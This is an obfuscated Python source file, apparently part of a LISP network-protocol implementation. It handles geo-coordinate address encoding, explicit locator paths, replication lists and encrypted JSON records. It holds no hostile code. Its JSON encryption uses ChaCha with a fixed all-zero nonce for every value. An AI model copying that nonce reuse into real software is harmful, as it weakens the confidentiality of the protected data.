return ( [ packet , IIi1iiIII11 ] )
if 32 - 32: iII111i * i11iIiiIii / IiII + i11iIiiIii + O0
if 51 - 51: I1Ii111
def lcaf_decode_eid ( self , packet ) :
i1I1iii1I11II = "BBB"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( [ None , None ] )
if 95 - 95: Ii1I / Ii1I * OoO0O00 . OoooooooOO . OoooooooOO * I11i
if 76 - 76: OoooooooOO - Ii1I + IiII % OoOoOO00 / OoooooooOO
if 55 - 55: i11iIiiIii - IiII * OOooOOo + II111iiii . I1ii11iIi11i / O0
if 16 - 16: II111iiii . Oo0Ooo * I1Ii111 + o0oOOo0O0Ooo - i11iIiiIii
if 98 - 98: II111iiii - i1IIi - ooOoO0o
i1o00Oo , II111Ii1I1I , iI1IIiI111iII = struct . unpack ( i1I1iii1I11II ,
packet [ : Iiiii ] )
if 36 - 36: IiII + o0oOOo0O0Ooo
if ( iI1IIiI111iII == LISP_LCAF_INSTANCE_ID_TYPE ) :
return ( [ self . lcaf_decode_iid ( packet ) , None ] )
elif ( iI1IIiI111iII == LISP_LCAF_MCAST_INFO_TYPE ) :
packet , IIi1iiIII11 = self . lcaf_decode_sg ( packet )
return ( [ packet , IIi1iiIII11 ] )
elif ( iI1IIiI111iII == LISP_LCAF_GEO_COORD_TYPE ) :
i1I1iii1I11II = "BBBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 81 - 81: OOooOOo / I11i % oO0o + ooOoO0o
Ii1IiIIIi1i , II111Ii1I1I , iI1IIiI111iII , o00oo0oOo0o0 , oOOO0O000Oo = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 10 - 10: oO0o / i11iIiiIii
if 73 - 73: OoO0O00 - i1IIi
if ( iI1IIiI111iII != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 52 - 52: I1ii11iIi11i
oOOO0O000Oo = socket . ntohs ( oOOO0O000Oo )
packet = packet [ Iiiii : : ]
if ( oOOO0O000Oo > len ( packet ) ) : return ( None )
if 4 - 4: Ii1I - iII111i + i1IIi - I1Ii111 / iII111i . Oo0Ooo
I1Ii1i111I = lisp_geo ( "" )
self . instance_id = 0
self . afi = LISP_AFI_GEO_COORD
self . address = I1Ii1i111I
packet = I1Ii1i111I . decode_geo ( packet , oOOO0O000Oo , o00oo0oOo0o0 )
self . mask_len = self . host_mask_len ( )
if 18 - 18: oO0o % iIii1I11I1II1 + ooOoO0o
return ( [ packet , None ] )
if 34 - 34: I1IiiI - OoooooooOO . IiII - OOooOOo % IiII
if 19 - 19: IiII + I1ii11iIi11i % Oo0Ooo
if 32 - 32: OOooOOo
if 46 - 46: II111iiii . OoO0O00
if 97 - 97: oO0o
if 45 - 45: i11iIiiIii / IiII + OoO0O00
class lisp_elp_node ( ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . probe = False
self . strict = False
self . eid = False
self . we_are_last = False
if 55 - 55: Ii1I / II111iiii - oO0o
if 58 - 58: i1IIi . OoooooooOO % iIii1I11I1II1 * o0oOOo0O0Ooo + O0 / oO0o
def copy_elp_node ( self ) :
IIii = lisp_elp_node ( )
IIii . copy_address ( self . address )
IIii . probe = self . probe
IIii . strict = self . strict
IIii . eid = self . eid
IIii . we_are_last = self . we_are_last
return ( IIii )
if 77 - 77: I11i . I1ii11iIi11i
if 92 - 92: i11iIiiIii + I11i % I1IiiI / ooOoO0o
if 28 - 28: i1IIi . I1IiiI
class lisp_elp ( ) :
def __init__ ( self , name ) :
self . elp_name = name
self . elp_nodes = [ ]
self . use_elp_node = None
self . we_are_last = False
if 41 - 41: I1ii11iIi11i . I1Ii111 * OoOoOO00 . I1Ii111 / o0oOOo0O0Ooo
if 41 - 41: o0oOOo0O0Ooo / o0oOOo0O0Ooo . Oo0Ooo
def copy_elp ( self ) :
O0OoO0O0O0oO = lisp_elp ( self . elp_name )
O0OoO0O0O0oO . use_elp_node = self . use_elp_node
O0OoO0O0O0oO . we_are_last = self . we_are_last
for IIii in self . elp_nodes :
O0OoO0O0O0oO . elp_nodes . append ( IIii . copy_elp_node ( ) )
if 4 - 4: I1Ii111
return ( O0OoO0O0O0oO )
if 85 - 85: iIii1I11I1II1 % Oo0Ooo
if 20 - 20: IiII + i11iIiiIii * OOooOOo
def print_elp ( self , want_marker ) :
Oo = ""
for IIii in self . elp_nodes :
ii1III1IiIII1 = ""
if ( want_marker ) :
if ( IIii == self . use_elp_node ) :
ii1III1IiIII1 = "*"
elif ( IIii . we_are_last ) :
ii1III1IiIII1 = "x"
if 51 - 51: I1ii11iIi11i * OOooOOo
if 100 - 100: OoO0O00 * oO0o + I1IiiI - o0oOOo0O0Ooo . o0oOOo0O0Ooo % OoO0O00
Oo += "{}{}({}{}{}), " . format ( ii1III1IiIII1 ,
IIii . address . print_address_no_iid ( ) ,
"r" if IIii . eid else "R" , "P" if IIii . probe else "p" ,
"S" if IIii . strict else "s" )
if 65 - 65: OoooooooOO / OoOoOO00 + I1IiiI - II111iiii / OoOoOO00
return ( Oo [ 0 : - 2 ] if Oo != "" else "" )
if 69 - 69: i11iIiiIii
if 77 - 77: I1ii11iIi11i % OoooooooOO - Oo0Ooo - Ii1I + I11i
def select_elp_node ( self ) :
Oo0o0OoO00 , II1III , OoO0o0OOOO = lisp_myrlocs
ooo = None
if 83 - 83: ooOoO0o
for IIii in self . elp_nodes :
if ( Oo0o0OoO00 and IIii . address . is_exact_match ( Oo0o0OoO00 ) ) :
ooo = self . elp_nodes . index ( IIii )
break
if 59 - 59: I1ii11iIi11i
if ( II1III and IIii . address . is_exact_match ( II1III ) ) :
ooo = self . elp_nodes . index ( IIii )
break
if 26 - 26: I11i . Ii1I
if 94 - 94: ooOoO0o . I1IiiI + IiII % I1IiiI / o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 21 - 21: O0 / OOooOOo - II111iiii + I1ii11iIi11i / OoooooooOO
if 81 - 81: i11iIiiIii / Oo0Ooo * i1IIi + OoO0O00 + O0 % I1ii11iIi11i
if 3 - 3: i11iIiiIii * IiII . Oo0Ooo % OoOoOO00 * I11i . iII111i
if 80 - 80: I11i - IiII
if 40 - 40: OOooOOo * I1IiiI % I11i . I1Ii111 % O0 . O0
if ( ooo == None ) :
self . use_elp_node = self . elp_nodes [ 0 ]
IIii . we_are_last = False
return
if 14 - 14: ooOoO0o . OoOoOO00 + ooOoO0o * OoOoOO00 . OoOoOO00 * Oo0Ooo
if 40 - 40: OoooooooOO
if 14 - 14: o0oOOo0O0Ooo / OOooOOo . OoOoOO00 % iIii1I11I1II1 % OoOoOO00
if 92 - 92: o0oOOo0O0Ooo + II111iiii
if 56 - 56: OoOoOO00 - OoOoOO00 / Ii1I
if 92 - 92: iIii1I11I1II1
if ( self . elp_nodes [ - 1 ] == self . elp_nodes [ ooo ] ) :
self . use_elp_node = None
IIii . we_are_last = True
return
if 21 - 21: I1IiiI
if 69 - 69: OoooooooOO + iII111i
if 29 - 29: ooOoO0o * I1IiiI / Oo0Ooo / I1ii11iIi11i
if 74 - 74: I1ii11iIi11i - ooOoO0o / OoOoOO00 - OoooooooOO * oO0o
if 45 - 45: o0oOOo0O0Ooo . I1Ii111 % Ii1I
self . use_elp_node = self . elp_nodes [ ooo + 1 ]
return
if 42 - 42: Oo0Ooo + i11iIiiIii - OOooOOo . I1ii11iIi11i % I1Ii111 . I1ii11iIi11i
if 59 - 59: OoooooooOO
if 91 - 91: i11iIiiIii / Oo0Ooo % I11i / O0
class lisp_geo ( ) :
def __init__ ( self , name ) :
self . geo_name = name
self . latitude = 0xffffffff
self . lat_mins = 0
self . lat_secs = 0
self . longitude = 0xffffffff
self . long_mins = 0
self . long_secs = 0
self . altitude = - 1
self . radius = 0
if 80 - 80: II111iiii / I1ii11iIi11i % I1IiiI . Ii1I
if 8 - 8: oO0o
def copy_geo ( self ) :
I1Ii1i111I = lisp_geo ( self . geo_name )
I1Ii1i111I . latitude = self . latitude
I1Ii1i111I . lat_mins = self . lat_mins
I1Ii1i111I . lat_secs = self . lat_secs
I1Ii1i111I . longitude = self . longitude
I1Ii1i111I . long_mins = self . long_mins
I1Ii1i111I . long_secs = self . long_secs
I1Ii1i111I . altitude = self . altitude
I1Ii1i111I . radius = self . radius
return ( I1Ii1i111I )
if 21 - 21: oO0o + iII111i . i11iIiiIii - II111iiii
if 14 - 14: I1Ii111
def no_geo_altitude ( self ) :
return ( self . altitude == - 1 )
if 81 - 81: II111iiii
if 55 - 55: O0 + o0oOOo0O0Ooo * I1IiiI - OoooooooOO
def parse_geo_string ( self , geo_str ) :
ooo = geo_str . find ( "]" )
if ( ooo != - 1 ) : geo_str = geo_str [ ooo + 1 : : ]
if 68 - 68: I11i + Oo0Ooo
if 15 - 15: O0
if 75 - 75: iII111i / OoOoOO00
if 2 - 2: i1IIi + oO0o % iII111i % I1ii11iIi11i + ooOoO0o . iII111i
if 26 - 26: I11i + o0oOOo0O0Ooo + Ii1I % I11i
if ( geo_str . find ( "/" ) != - 1 ) :
geo_str , O00o0OoO = geo_str . split ( "/" )
self . radius = int ( O00o0OoO )
if 3 - 3: i11iIiiIii / I1Ii111
if 40 - 40: OoooooooOO / o0oOOo0O0Ooo + OoOoOO00
geo_str = geo_str . split ( "-" )
if ( len ( geo_str ) < 8 ) : return ( False )
if 73 - 73: OOooOOo / Oo0Ooo
OO0ooo = geo_str [ 0 : 4 ]
Oooo0oO00ooO = geo_str [ 4 : 8 ]
if 33 - 33: o0oOOo0O0Ooo * OOooOOo
if 7 - 7: i11iIiiIii . OOooOOo * Ii1I . i1IIi
if 4 - 4: O0 - IiII - II111iiii / iII111i - OOooOOo
if 6 - 6: ooOoO0o + OOooOOo - I1IiiI + OOooOOo
if ( len ( geo_str ) > 8 ) : self . altitude = int ( geo_str [ 8 ] )
if 16 - 16: OoO0O00 * OoOoOO00 - Oo0Ooo
if 44 - 44: ooOoO0o / OoOoOO00 - O0 + iII111i / iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 - iII111i / O0
if 39 - 39: OoooooooOO * iIii1I11I1II1 - o0oOOo0O0Ooo / O0
self . latitude = int ( OO0ooo [ 0 ] )
self . lat_mins = int ( OO0ooo [ 1 ] )
self . lat_secs = int ( OO0ooo [ 2 ] )
if ( OO0ooo [ 3 ] == "N" ) : self . latitude = - self . latitude
if 29 - 29: I11i % OoOoOO00 - oO0o + II111iiii . II111iiii
if 25 - 25: Oo0Ooo * ooOoO0o % I1Ii111
if 34 - 34: OoOoOO00 / I1Ii111 - ooOoO0o
if 66 - 66: I11i * OoO0O00
self . longitude = int ( Oooo0oO00ooO [ 0 ] )
self . long_mins = int ( Oooo0oO00ooO [ 1 ] )
self . long_secs = int ( Oooo0oO00ooO [ 2 ] )
if ( Oooo0oO00ooO [ 3 ] == "E" ) : self . longitude = - self . longitude
return ( True )
if 98 - 98: IiII . Oo0Ooo + I1Ii111
if 63 - 63: oO0o * I1IiiI * oO0o
def print_geo ( self ) :
oO0000000 = "N" if self . latitude < 0 else "S"
O00O0 = "E" if self . longitude < 0 else "W"
if 41 - 41: i11iIiiIii . I1IiiI / O0
Ii1IIIIiI11 = "{}-{}-{}-{}-{}-{}-{}-{}" . format ( abs ( self . latitude ) ,
self . lat_mins , self . lat_secs , oO0000000 , abs ( self . longitude ) ,
self . long_mins , self . long_secs , O00O0 )
if 93 - 93: Oo0Ooo % OoOoOO00 . II111iiii
if ( self . no_geo_altitude ( ) == False ) :
Ii1IIIIiI11 += "-" + str ( self . altitude )
if 60 - 60: OoO0O00 - IiII % O0 * I1ii11iIi11i
if 61 - 61: O0
if 51 - 51: I1Ii111 - I11i % o0oOOo0O0Ooo * Oo0Ooo - oO0o + II111iiii
if 7 - 7: oO0o
if 98 - 98: Ii1I + oO0o + i1IIi + IiII % IiII
if ( self . radius != 0 ) : Ii1IIIIiI11 += "/{}" . format ( self . radius )
return ( Ii1IIIIiI11 )
if 79 - 79: oO0o % I11i * I11i . OOooOOo % OoooooooOO
if 71 - 71: iII111i
def geo_url ( self ) :
iIIi1i = os . getenv ( "LISP_GEO_ZOOM_LEVEL" )
iIIi1i = "10" if ( iIIi1i == "" or iIIi1i . isdigit ( ) == False ) else iIIi1i
III1iIi111I1 , i1I1ii111 = self . dms_to_decimal ( )
OO0ooo0O = ( "http://maps.googleapis.com/maps/api/staticmap?center={},{}" + "&markers=color:blue%7Clabel:lisp%7C{},{}" + "&zoom={}&size=1024x1024&sensor=false" ) . format ( III1iIi111I1 , i1I1ii111 , III1iIi111I1 , i1I1ii111 ,
# i1IIi - O0
# i11iIiiIii * I1ii11iIi11i * OoooooooOO
iIIi1i )
return ( OO0ooo0O )
if 83 - 83: iII111i - I1Ii111
if 28 - 28: IiII
def print_geo_url ( self ) :
I1Ii1i111I = self . print_geo ( )
if ( self . radius == 0 ) :
OO0ooo0O = self . geo_url ( )
Iii11I111Ii11 = "<a href='{}'>{}</a>" . format ( OO0ooo0O , I1Ii1i111I )
else :
OO0ooo0O = I1Ii1i111I . replace ( "/" , "-" )
Iii11I111Ii11 = "<a href='/lisp/geo-map/{}'>{}</a>" . format ( OO0ooo0O , I1Ii1i111I )
if 42 - 42: oO0o + Oo0Ooo * I1ii11iIi11i . o0oOOo0O0Ooo / iIii1I11I1II1
return ( Iii11I111Ii11 )
if 9 - 9: I1Ii111 * II111iiii % Ii1I - Ii1I % OoO0O00 % o0oOOo0O0Ooo
if 26 - 26: o0oOOo0O0Ooo - I1IiiI / OoooooooOO / ooOoO0o % iIii1I11I1II1 % I1ii11iIi11i
def dms_to_decimal ( self ) :
IiiI11i1I11I , ii111iI1i , o0i11ii1I1II11 = self . latitude , self . lat_mins , self . lat_secs
I1I1iii1 = float ( abs ( IiiI11i1I11I ) )
I1I1iii1 += float ( ii111iI1i * 60 + o0i11ii1I1II11 ) / 3600
if ( IiiI11i1I11I > 0 ) : I1I1iii1 = - I1I1iii1
o0OO = I1I1iii1
if 66 - 66: i1IIi . IiII / OoOoOO00 / i11iIiiIii
IiiI11i1I11I , ii111iI1i , o0i11ii1I1II11 = self . longitude , self . long_mins , self . long_secs
I1I1iii1 = float ( abs ( IiiI11i1I11I ) )
I1I1iii1 += float ( ii111iI1i * 60 + o0i11ii1I1II11 ) / 3600
if ( IiiI11i1I11I > 0 ) : I1I1iii1 = - I1I1iii1
oOOo000000 = I1I1iii1
return ( ( o0OO , oOOo000000 ) )
if 4 - 4: i1IIi - ooOoO0o
if 14 - 14: i1IIi . OoOoOO00 % I1IiiI / iII111i * i11iIiiIii + O0
def get_distance ( self , geo_point ) :
IIIIi1 = self . dms_to_decimal ( )
iIiiIIOoO = geo_point . dms_to_decimal ( )
IiiIIIii1I = vincenty ( IIIIi1 , iIiiIIOoO )
return ( IiiIIIii1I . km )
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
def point_in_circle ( self , geo_point ) :
IiIIiI = self . get_distance ( geo_point )
return ( IiIIiI <= self . radius )
if 99 - 99: I1Ii111 . II111iiii * IiII . II111iiii + OoOoOO00
if 36 - 36: OoO0O00 * iII111i % ooOoO0o % OoOoOO00 * I1IiiI % i1IIi
def encode_geo ( self ) :
OoOoO00OoOOo = socket . htons ( LISP_AFI_LCAF )
OOoo0Oo00 = socket . htons ( 20 + 2 )
II111Ii1I1I = 0
if 25 - 25: iII111i + I1IiiI / OoO0O00 - I1IiiI / OoooooooOO - ooOoO0o
III1iIi111I1 = abs ( self . latitude )
iiIIII1I1ii = ( ( self . lat_mins * 60 ) + self . lat_secs ) * 1000
if ( self . latitude < 0 ) : II111Ii1I1I |= 0x40
if 92 - 92: I1Ii111 / I1IiiI / I1ii11iIi11i + I11i + Ii1I
i1I1ii111 = abs ( self . longitude )
o0ooO000OO = ( ( self . long_mins * 60 ) + self . long_secs ) * 1000
if ( self . longitude < 0 ) : II111Ii1I1I |= 0x20
if 62 - 62: Ii1I / Oo0Ooo . OoO0O00 - OOooOOo
oOOOOoOO0Oo = 0
if ( self . no_geo_altitude ( ) == False ) :
oOOOOoOO0Oo = socket . htonl ( self . altitude )
II111Ii1I1I |= 0x10
if 84 - 84: Oo0Ooo * I1Ii111 - o0oOOo0O0Ooo % Ii1I
O00o0OoO = socket . htons ( self . radius )
if ( O00o0OoO != 0 ) : II111Ii1I1I |= 0x06
if 69 - 69: I11i + OoOoOO00 - i11iIiiIii * O0 % O0
O00Oo000 = struct . pack ( "HBBBBH" , OoOoO00OoOOo , 0 , 0 , LISP_LCAF_GEO_COORD_TYPE ,
0 , OOoo0Oo00 )
O00Oo000 += struct . pack ( "BBHBBHBBHIHHH" , II111Ii1I1I , 0 , 0 , III1iIi111I1 , iiIIII1I1ii >> 16 ,
socket . htons ( iiIIII1I1ii & 0x0ffff ) , i1I1ii111 , o0ooO000OO >> 16 ,
socket . htons ( o0ooO000OO & 0xffff ) , oOOOOoOO0Oo , O00o0OoO , 0 , 0 )
if 29 - 29: iIii1I11I1II1 / i11iIiiIii + Oo0Ooo
return ( O00Oo000 )
if 99 - 99: I1IiiI - iII111i * Ii1I - OoOoOO00 / i11iIiiIii - i1IIi
if 46 - 46: I1ii11iIi11i * ooOoO0o
def decode_geo ( self , packet , lcaf_len , radius_hi ) :
i1I1iii1I11II = "BBHBBHBBHIHHH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( lcaf_len < Iiiii ) : return ( None )
if 4 - 4: I1Ii111 * II111iiii
II111Ii1I1I , I1II1I11Ii1i , oOI1iI1 , III1iIi111I1 , iii1 , iiIIII1I1ii , i1I1ii111 , IiI1iI1I , o0ooO000OO , oOOOOoOO0Oo , O00o0OoO , oO000o0ooO , O0ooo0 = struct . unpack ( i1I1iii1I11II ,
# oO0o
packet [ : Iiiii ] )
if 65 - 65: Oo0Ooo . i1IIi + II111iiii . i1IIi * O0
if 25 - 25: IiII - I11i + IiII + iII111i + OoOoOO00 - Oo0Ooo
if 31 - 31: iII111i . II111iiii - iIii1I11I1II1
if 38 - 38: ooOoO0o - IiII % OoO0O00 - i11iIiiIii
O0ooo0 = socket . ntohs ( O0ooo0 )
if ( O0ooo0 == LISP_AFI_LCAF ) : return ( None )
if 44 - 44: I1Ii111 + ooOoO0o + OoO0O00
if ( II111Ii1I1I & 0x40 ) : III1iIi111I1 = - III1iIi111I1
self . latitude = III1iIi111I1
oO0OO = ( ( iii1 << 16 ) | socket . ntohs ( iiIIII1I1ii ) ) / 1000
self . lat_mins = oO0OO / 60
self . lat_secs = oO0OO % 60
if 94 - 94: i1IIi - i11iIiiIii + I1Ii111 % Oo0Ooo % Oo0Ooo . OoO0O00
if ( II111Ii1I1I & 0x20 ) : i1I1ii111 = - i1I1ii111
self . longitude = i1I1ii111
O0000OOO0OOOo = ( ( IiI1iI1I << 16 ) | socket . ntohs ( o0ooO000OO ) ) / 1000
self . long_mins = O0000OOO0OOOo / 60
self . long_secs = O0000OOO0OOOo % 60
if 89 - 89: II111iiii
self . altitude = socket . ntohl ( oOOOOoOO0Oo ) if ( II111Ii1I1I & 0x10 ) else - 1
O00o0OoO = socket . ntohs ( O00o0OoO )
self . radius = O00o0OoO if ( II111Ii1I1I & 0x02 ) else O00o0OoO * 1000
if 41 - 41: iIii1I11I1II1
self . geo_name = None
packet = packet [ Iiiii : : ]
if 26 - 26: Oo0Ooo / i1IIi + Oo0Ooo
if ( O0ooo0 != 0 ) :
self . rloc . afi = O0ooo0
packet = self . rloc . unpack_address ( packet )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 76 - 76: I1ii11iIi11i * i1IIi % oO0o
return ( packet )
if 80 - 80: i1IIi * II111iiii . O0 % I1ii11iIi11i / ooOoO0o
if 58 - 58: I1IiiI * I1ii11iIi11i - i1IIi % I1Ii111 % O0
if 24 - 24: I11i + I11i % I11i
if 63 - 63: i11iIiiIii + iIii1I11I1II1 / oO0o % IiII - O0
if 21 - 21: II111iiii
if 89 - 89: OOooOOo % i11iIiiIii * OoOoOO00 % oO0o / O0 * i1IIi
class lisp_rle_node ( ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . level = 0
self . translated_port = 0
self . rloc_name = None
if 16 - 16: IiII
if 42 - 42: i1IIi / Ii1I * I1ii11iIi11i
def copy_rle_node ( self ) :
Iii = lisp_rle_node ( )
Iii . address . copy_address ( self . address )
Iii . level = self . level
Iii . translated_port = self . translated_port
Iii . rloc_name = self . rloc_name
return ( Iii )
if 9 - 9: I11i % i1IIi / i1IIi / OoO0O00
if 46 - 46: I1Ii111 * II111iiii + II111iiii * O0 % II111iiii
def store_translated_rloc ( self , rloc , port ) :
self . address . copy_address ( rloc )
self . translated_port = port
if 37 - 37: OOooOOo . iIii1I11I1II1 / O0 . ooOoO0o + OOooOOo - OoooooooOO
if 96 - 96: I1Ii111 / oO0o . I1ii11iIi11i % I1IiiI * OOooOOo
def get_encap_keys ( self ) :
Oo0O00O = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 99 - 99: i11iIiiIii - I1Ii111
oo0o00OO = self . address . print_address_no_iid ( ) + ":" + Oo0O00O
if 4 - 4: o0oOOo0O0Ooo - i11iIiiIii . iIii1I11I1II1 . OOooOOo % IiII
try :
iIi11III = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( iIi11III [ 1 ] ) : return ( iIi11III [ 1 ] . encrypt_key , iIi11III [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 68 - 68: I11i / iII111i - IiII . iIii1I11I1II1 / o0oOOo0O0Ooo
if 54 - 54: II111iiii * I1IiiI
if 49 - 49: I1ii11iIi11i
if 31 - 31: o0oOOo0O0Ooo - OoOoOO00 + I1ii11iIi11i . oO0o - O0
class lisp_rle ( ) :
def __init__ ( self , name ) :
self . rle_name = name
self . rle_nodes = [ ]
self . rle_forwarding_list = [ ]
if 61 - 61: I1ii11iIi11i * II111iiii . i1IIi
if 60 - 60: OoooooooOO % ooOoO0o * i11iIiiIii * OoooooooOO % IiII
def copy_rle ( self ) :
iI1Ii11 = lisp_rle ( self . rle_name )
for Iii in self . rle_nodes :
iI1Ii11 . rle_nodes . append ( Iii . copy_rle_node ( ) )
if 15 - 15: oO0o
iI1Ii11 . build_forwarding_list ( )
return ( iI1Ii11 )
if 40 - 40: I1Ii111
if 77 - 77: II111iiii - o0oOOo0O0Ooo . Ii1I
def print_rle ( self , html , do_formatting ) :
II1I = ""
for Iii in self . rle_nodes :
Oo0O00O = Iii . translated_port
if 47 - 47: o0oOOo0O0Ooo % OOooOOo + I1Ii111
o0o0 = ""
if ( Iii . rloc_name != None ) :
o0o0 = Iii . rloc_name
if ( do_formatting ) : o0o0 = blue ( o0o0 , html )
o0o0 = "({})" . format ( o0o0 )
if 31 - 31: Ii1I + O0 - OOooOOo * O0 * I11i
if 53 - 53: I1ii11iIi11i + i11iIiiIii / iIii1I11I1II1 + OoooooooOO + IiII * I1IiiI
oo0o00OO = Iii . address . print_address_no_iid ( )
if ( Iii . address . is_local ( ) ) : oo0o00OO = red ( oo0o00OO , html )
II1I += "{}{}{}, " . format ( oo0o00OO , "" if Oo0O00O == 0 else ":" + str ( Oo0O00O ) , o0o0 )
if 16 - 16: i11iIiiIii - oO0o . i11iIiiIii + OoO0O00 + i11iIiiIii
if 85 - 85: I1ii11iIi11i - ooOoO0o + I1Ii111 + I1Ii111
return ( II1I [ 0 : - 2 ] if II1I != "" else "" )
if 13 - 13: II111iiii
if 22 - 22: o0oOOo0O0Ooo
def build_forwarding_list ( self ) :
oOOoOoooOo0o = - 1
for Iii in self . rle_nodes :
if ( oOOoOoooOo0o == - 1 ) :
if ( Iii . address . is_local ( ) ) : oOOoOoooOo0o = Iii . level
else :
if ( Iii . level > oOOoOoooOo0o ) : break
if 45 - 45: I1Ii111 + OoooooooOO + o0oOOo0O0Ooo * II111iiii
if 12 - 12: I1ii11iIi11i / O0
oOOoOoooOo0o = 0 if oOOoOoooOo0o == - 1 else Iii . level
if 18 - 18: OoOoOO00 . i11iIiiIii + i1IIi / OoooooooOO - IiII % OoO0O00
self . rle_forwarding_list = [ ]
for Iii in self . rle_nodes :
if ( Iii . level == oOOoOoooOo0o or ( oOOoOoooOo0o == 0 and
Iii . level == 128 ) ) :
if ( lisp_i_am_rtr == False and Iii . address . is_local ( ) ) :
oo0o00OO = Iii . address . print_address_no_iid ( )
lprint ( "Exclude local RLE RLOC {}" . format ( oo0o00OO ) )
continue
if 47 - 47: iII111i % IiII + I1Ii111 * o0oOOo0O0Ooo * OoooooooOO
self . rle_forwarding_list . append ( Iii )
if 100 - 100: Oo0Ooo / I1IiiI / iII111i / I1Ii111 / oO0o % o0oOOo0O0Ooo
if 16 - 16: I1IiiI + I11i
if 66 - 66: OoooooooOO % II111iiii / I1Ii111 . i11iIiiIii
if 67 - 67: Ii1I + Oo0Ooo - I1IiiI - IiII + oO0o + Oo0Ooo
if 84 - 84: I1ii11iIi11i % oO0o - OOooOOo * Ii1I
class lisp_json ( ) :
def __init__ ( self , name , string , encrypted = False , ms_encrypt = False ) :
self . json_name = name
self . json_string = string
self . json_encrypted = False
if 78 - 78: i1IIi / ooOoO0o / oO0o
if 21 - 21: IiII % Ii1I + OOooOOo + IiII
if 90 - 90: o0oOOo0O0Ooo
if 38 - 38: OoOoOO00 / OOooOOo % OoooooooOO * I1ii11iIi11i
if 7 - 7: I11i * O0 + Oo0Ooo / O0 * oO0o + i11iIiiIii
if 74 - 74: OoOoOO00
if 91 - 91: i11iIiiIii / Ii1I % OOooOOo % O0 - I11i . I11i
if 78 - 78: i1IIi + I11i % OoooooooOO + i1IIi + iII111i % Ii1I
if 87 - 87: ooOoO0o . iIii1I11I1II1
if 99 - 99: Ii1I + OoooooooOO * IiII * i11iIiiIii - iIii1I11I1II1
if ( len ( lisp_ms_json_keys ) != 0 ) :
if ( ms_encrypt == False ) : return
self . json_key_id = lisp_ms_json_keys . keys ( ) [ 0 ]
self . json_key = lisp_ms_json_keys [ self . json_key_id ]
self . encrypt_json ( )
if 58 - 58: IiII % i1IIi . i11iIiiIii
if 5 - 5: OoOoOO00
if ( lisp_log_id == "lig" and encrypted ) :
Oo000O000 = os . getenv ( "LISP_JSON_KEY" )
if ( Oo000O000 != None ) :
ooo = - 1
if ( Oo000O000 [ 0 ] == "[" and "]" in Oo000O000 ) :
ooo = Oo000O000 . find ( "]" )
self . json_key_id = int ( Oo000O000 [ 1 : ooo ] )
if 75 - 75: OOooOOo
self . json_key = Oo000O000 [ ooo + 1 : : ]
if 60 - 60: ooOoO0o - II111iiii - iIii1I11I1II1
self . decrypt_json ( )
if 23 - 23: I1ii11iIi11i
if 68 - 68: OoO0O00 . oO0o / IiII - II111iiii % Oo0Ooo
if 24 - 24: II111iiii / I1ii11iIi11i + oO0o / Ii1I + IiII % oO0o
if 86 - 86: I1IiiI
def add ( self ) :
self . delete ( )
lisp_json_list [ self . json_name ] = self
if 83 - 83: I11i % Ii1I + IiII % I11i / i1IIi . oO0o
if 56 - 56: I1Ii111 - OOooOOo % o0oOOo0O0Ooo
def delete ( self ) :
if ( lisp_json_list . has_key ( self . json_name ) ) :
del ( lisp_json_list [ self . json_name ] )
lisp_json_list [ self . json_name ] = None
if 30 - 30: I1Ii111 % i1IIi
if 98 - 98: oO0o . i11iIiiIii / Ii1I - Ii1I
if 23 - 23: iIii1I11I1II1
def print_json ( self , html ) :
iIIIiI = self . json_string
IiiiIi = "***"
if ( html ) : IiiiIi = red ( IiiiIi , html )
I1iii11III = IiiiIi + self . json_string + IiiiIi
if ( self . valid_json ( ) ) : return ( iIIIiI )
return ( I1iii11III )
if 36 - 36: i1IIi . oO0o . I1Ii111 - I1Ii111 . OOooOOo
if 59 - 59: IiII - i11iIiiIii
def valid_json ( self ) :
try :
json . loads ( self . json_string )
except :
return ( False )
if 23 - 23: OoOoOO00 . i1IIi / iIii1I11I1II1 + iII111i / iII111i
return ( True )
if 22 - 22: Ii1I % OoooooooOO - IiII / i1IIi / iIii1I11I1II1 . O0
if 61 - 61: OoOoOO00 * OOooOOo
def encrypt_json ( self ) :
II11iI11i1 = self . json_key . zfill ( 32 )
iiI1iiIiiiI1I = "0" * 8
if 3 - 3: I1IiiI + Oo0Ooo / I1Ii111
IiiI = json . loads ( self . json_string )
for Oo000O000 in IiiI :
i11II = IiiI [ Oo000O000 ]
i11II = chacha . ChaCha ( II11iI11i1 , iiI1iiIiiiI1I ) . encrypt ( i11II )
IiiI [ Oo000O000 ] = binascii . hexlify ( i11II )
if 28 - 28: I1IiiI . O0 % o0oOOo0O0Ooo / I11i
self . json_string = json . dumps ( IiiI )
self . json_encrypted = True
if 48 - 48: II111iiii % I1ii11iIi11i - II111iiii
if 29 - 29: I1Ii111 - I1Ii111 - I11i * iIii1I11I1II1 % OoO0O00 % IiII
def decrypt_json ( self ) :
II11iI11i1 = self . json_key . zfill ( 32 )
iiI1iiIiiiI1I = "0" * 8
if 73 - 73: i1IIi . OoooooooOO / OoOoOO00 % Ii1I / Ii1I / Ii1I
IiiI = json . loads ( self . json_string )
for Oo000O000 in IiiI :
i11II = binascii . unhexlify ( IiiI [ Oo000O000 ] )
IiiI [ Oo000O000 ] = chacha . ChaCha ( II11iI11i1 , iiI1iiIiiiI1I ) . encrypt ( i11II )
if 40 - 40: I1Ii111 - iIii1I11I1II1
try :
self . json_string = json . dumps ( IiiI )
self . json_encrypted = False
except :
pass
if 88 - 88: OOooOOo * O0 * OoOoOO00
if 26 - 26: Ii1I
if 65 - 65: iII111i / iIii1I11I1II1 + I11i - iIii1I11I1II1 - Ii1I . I1Ii111
